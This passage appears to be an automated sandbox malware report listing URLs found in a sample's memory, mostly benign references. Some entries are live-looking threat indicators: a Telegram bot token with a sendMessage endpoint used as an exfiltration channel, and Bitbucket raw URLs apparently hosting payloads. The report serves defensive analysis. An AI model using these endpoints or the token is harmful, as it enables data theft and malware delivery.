00000023.00000003.2192423602.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.0000000002745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
            Source: synaptics.exe, 00000023.00000002.2483896913.0000000002103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: synaptics.exe, 00000023.00000003.1935039535.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935168660.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1929743426.0000000002034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
            Source: synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
            Source: synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915648123.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c
            Source: synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2216147301.00000000045ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.egenix.com/files/python/platform.py
            Source: synaptics.exe, 00000023.00000003.2160636724.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2176498589.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260160456.0000000002248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.flashvidz.tk/Zenonprogram
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.freetype.org/FreeTypefont
            Source: synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PR
            Source: synaptics.exe, 00000023.00000003.2216147301.00000000045ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
            Source: synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915648123.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.haihaisoft.com/Contact.aspx
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.haihaisoft.comSumatraPDF
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5
            Source: synaptics.exe, 00000023.00000003.2040398123.00000000020EC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2036927307.0000000002051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/media-types
            Source: synaptics.exe, 00000023.00000003.1959266113.0000000002029000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1945615417.0000000002468000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1945987768.0000000002468000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002028000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1954644425.0000000002029000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1951246031.0000000002029000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1948416200.0000000002029000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1944517560.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1947553736.000000000201D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1944346111.0000000002041000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946162050.0000000002040000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946575710.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1944517560.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: synaptics.exe, 00000023.00000003.1935168660.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1931385673.0000000002030000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1947041661.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
            Source: synaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc1421.txt
            Source: synaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc1423.txt
            Source: synaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
            Source: synaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc5208.txt
            Source: synaptics.exe, 00000023.00000003.1935039535.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935168660.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1929743426.0000000002034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
            Source: synaptics.exe, 00000023.00000003.2059049701.0000000001FF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2060656466.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2069544754.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkware.com/documents/casestudies/APPNOTE.TXT
            Source: synaptics.exe, 00000023.00000002.2509773814.00000000045CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: synaptics.exe, 00000023.00000002.2509773814.00000000045CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps.Path.
            Source: synaptics.exe, 00000023.00000003.2145450452.00000000023C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.winimage.com/zLibDllbad
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.zeniko.ch/#SumatraPDFSimon
            Source: synaptics.exe, 00000023.00000003.2108776953.0000000001F7E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108776953.0000000001F92000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2103638638.0000000001F71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2106086828.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108187214.000000000278B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000002050000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2161116467.000000000204F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108461816.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2137443994.0000000002050000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2098540705.000000000278B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2128006354.0000000002050000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2190964614.0000000002050000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2112701662.0000000001F61000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2100621573.0000000002050000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2110887993.0000000002054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: synaptics.exe, 00000023.00000002.2535963450.00000000050C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs/sendMessage
            Source: synaptics.exe, 00000023.00000002.2528538931.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs/sendMessage?chat_id=-4530
            Source: synaptics.exe, 00000023.00000002.2528538931.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7414494371:aaggby4xavxtwfgayiaj6oxvjovrqgjdgvs/sendmessage?chat_id=-4530
            Source: synaptics.exe, 00000023.00000002.2508011307.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2326402328.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2442445774.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botz
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
            Source: synaptics.exe, 00000023.00000003.2444078875.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.fro
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1980946741.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: synaptics.exe, 00000023.00000003.1979359000.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.p
            Source: synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
            Source: cmd.exe, 00000012.00000002.1897153917.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375
            Source: synaptics.exe, 00000023.00000002.2456483780.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2470279767.0000000001950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All
            Source: synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lonenone111/adonis/raw/89091ec6e33c9172bd3cb331f105865ef2ded747/Adonis_Pure_En
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lonenone111/adonis/raw/9b4527441ae340366161f4f5c7b718a3e2d967fd/Adonis_Pure_B6
            Source: synaptics.exe, 00000023.00000003.2133539100.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2138152554.00000000021DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue20164
            Source: synaptics.exe, 00000023.00000003.2153905637.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue25942
            Source: synaptics.exe, 00000023.00000003.1957786322.000000000203B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29302
            Source: synaptics.exe, 00000023.00000003.1887784322.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29585
            Source: synaptics.exe, 00000023.00000003.2053651117.0000000001F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue39682
            Source: synaptics.exe, 00000023.00000003.1935039535.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1929743426.0000000002034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/msg352381
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2094571264.00000000020F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: synaptics.exe, 00000023.00000002.2501384899.0000000004080000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1980946741.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2444078875.0000000001F7E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
            Source: synaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flak.tedunangst.com/post/new-openssh-key-format-and-bcrypt-pbkdf
            Source: synaptics.exe, 00000023.00000003.2030551439.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.000000000218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapo
